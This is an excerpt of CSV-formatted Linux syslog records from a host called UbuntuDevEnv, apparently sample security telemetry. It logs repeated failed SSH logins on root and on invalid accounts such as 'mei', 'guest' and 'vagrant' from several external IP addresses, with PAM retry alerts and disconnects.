+14932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:37,UbuntuDevEnv,2019-06-26 05:11:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:37,UbuntuDevEnv,2019-06-26 05:11:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,6660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+14934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:37,UbuntuDevEnv,2019-06-26 05:11:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56094 ssh2,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:39,UbuntuDevEnv,2019-06-26 05:11:38,auth,UbuntuDevEnv,info,Failed password for invalid user mei from 45.55.190.46 port 33450 ssh2,6660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mei,45.55.190.4,33450,,
+14936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:39,UbuntuDevEnv,2019-06-26 05:11:39,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56094 ssh2,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:43,UbuntuDevEnv,2019-06-26 05:11:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56094 ssh2,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:43,UbuntuDevEnv,2019-06-26 05:11:43,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 33450:11: Bye Bye [preauth],6660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,33450,,
+14939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:43,UbuntuDevEnv,2019-06-26 05:11:43,auth,UbuntuDevEnv,info,Disconnected from invalid user mei 45.55.190.46 port 33450 [preauth],6660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mei,45.55.190.4,33450,,
+14940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:45,UbuntuDevEnv,2019-06-26 05:11:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56094 ssh2,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:45,UbuntuDevEnv,2019-06-26 05:11:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:45,UbuntuDevEnv,2019-06-26 05:11:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:45,UbuntuDevEnv,2019-06-26 05:11:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 56094 ssh2 [preauth],6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:45,UbuntuDevEnv,2019-06-26 05:11:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 56094: Too many authentication failures [preauth],6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,56094,,
+14945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:48,UbuntuDevEnv,2019-06-26 05:11:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:50,UbuntuDevEnv,2019-06-26 05:11:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 63182 ssh2,6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63182,,
+14947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:02,UbuntuDevEnv,2019-06-26 05:12:00,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 63182 ssh2],6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63182,,
+14948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:03,UbuntuDevEnv,2019-06-26 05:12:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:03,UbuntuDevEnv,2019-06-26 05:12:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 63182 ssh2 [preauth],6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63182,,
+14950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:03,UbuntuDevEnv,2019-06-26 05:12:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 63182 ssh2,6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,63182,,
+14951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:03,UbuntuDevEnv,2019-06-26 05:12:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 63182: Too many authentication failures [preauth],6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,63182,,
+14952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:03,UbuntuDevEnv,2019-06-26 05:12:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6755,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:06,UbuntuDevEnv,2019-06-26 05:12:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:08,UbuntuDevEnv,2019-06-26 05:12:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5745 ssh2,6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5745,,
+14955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:19,UbuntuDevEnv,2019-06-26 05:12:18,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 5745 ssh2],6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5745,,
+14956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:19,UbuntuDevEnv,2019-06-26 05:12:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38  user=root,6879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,200.6.188.3,,0,
+14957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 5745: Too many authentication failures [preauth],6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,5745,,
+14958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 5745 ssh2,6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5745,,
+14961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 5745 ssh2 [preauth],6819,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5745,,
+14962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,auth,UbuntuDevEnv,info,Failed password for root from 200.6.188.38 port 7883 ssh2,6879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,7883,,
+14963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 7883:11: Bye Bye [preauth],6879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,7883,,
+14964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:21,UbuntuDevEnv,2019-06-26 05:12:21,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 200.6.188.38 port 7883 [preauth],6879,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,200.6.188.3,7883,,
+14965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:24,UbuntuDevEnv,2019-06-26 05:12:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:26,UbuntuDevEnv,2019-06-26 05:12:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 29506 ssh2,6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29506,,
+14967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:39,UbuntuDevEnv,2019-06-26 05:12:39,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 29506: Too many authentication failures [preauth],6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,29506,,
+14968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:39,UbuntuDevEnv,2019-06-26 05:12:39,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 29506 ssh2],6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29506,,
+14969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:39,UbuntuDevEnv,2019-06-26 05:12:39,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 29506 ssh2 [preauth],6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,29506,,
+14970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:39,UbuntuDevEnv,2019-06-26 05:12:39,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:39,UbuntuDevEnv,2019-06-26 05:12:39,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:43,UbuntuDevEnv,2019-06-26 05:12:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:44,auth,UbuntuDevEnv,info,Invalid user guest from 196.41.208.238 port 44679,6970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.41.208.2,44679,,
+14974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,6970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37017 ssh2,6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37017,,
+14977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:45,auth,UbuntuDevEnv,info,Invalid user vagrant from 140.143.223.242 port 52912,6969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,140.143.223.2,52912,,
+14978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,6969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+14979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:45,UbuntuDevEnv,2019-06-26 05:12:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:46,UbuntuDevEnv,2019-06-26 05:12:46,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 196.41.208.238 port 44679 ssh2,6970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.41.208.2,44679,,
+14981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:47,UbuntuDevEnv,2019-06-26 05:12:46,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 44679:11: Bye Bye [preauth],6970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,44679,,
+14982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:47,UbuntuDevEnv,2019-06-26 05:12:46,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 196.41.208.238 port 44679 [preauth],6970,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.41.208.2,44679,,
+14983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:48,UbuntuDevEnv,2019-06-26 05:12:47,auth,UbuntuDevEnv,info,Failed password for invalid user vagrant from 140.143.223.242 port 52912 ssh2,6969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,140.143.223.2,52912,,
+14984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:48,UbuntuDevEnv,2019-06-26 05:12:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37017 ssh2,6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37017,,
+14985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:48,UbuntuDevEnv,2019-06-26 05:12:47,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 52912:11: Bye Bye [preauth],6969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,52912,,
+14986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:48,UbuntuDevEnv,2019-06-26 05:12:47,auth,UbuntuDevEnv,info,Disconnected from invalid user vagrant 140.143.223.242 port 52912 [preauth],6969,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vagrant,140.143.223.2,52912,,
+14987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:50,UbuntuDevEnv,2019-06-26 05:12:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37017 ssh2,6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37017,,
+14988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:59,UbuntuDevEnv,2019-06-26 05:12:58,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 37017: Too many authentication failures [preauth],6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,37017,,
+14989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:59,UbuntuDevEnv,2019-06-26 05:12:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:59,UbuntuDevEnv,2019-06-26 05:12:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 37017 ssh2 [preauth],6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37017,,
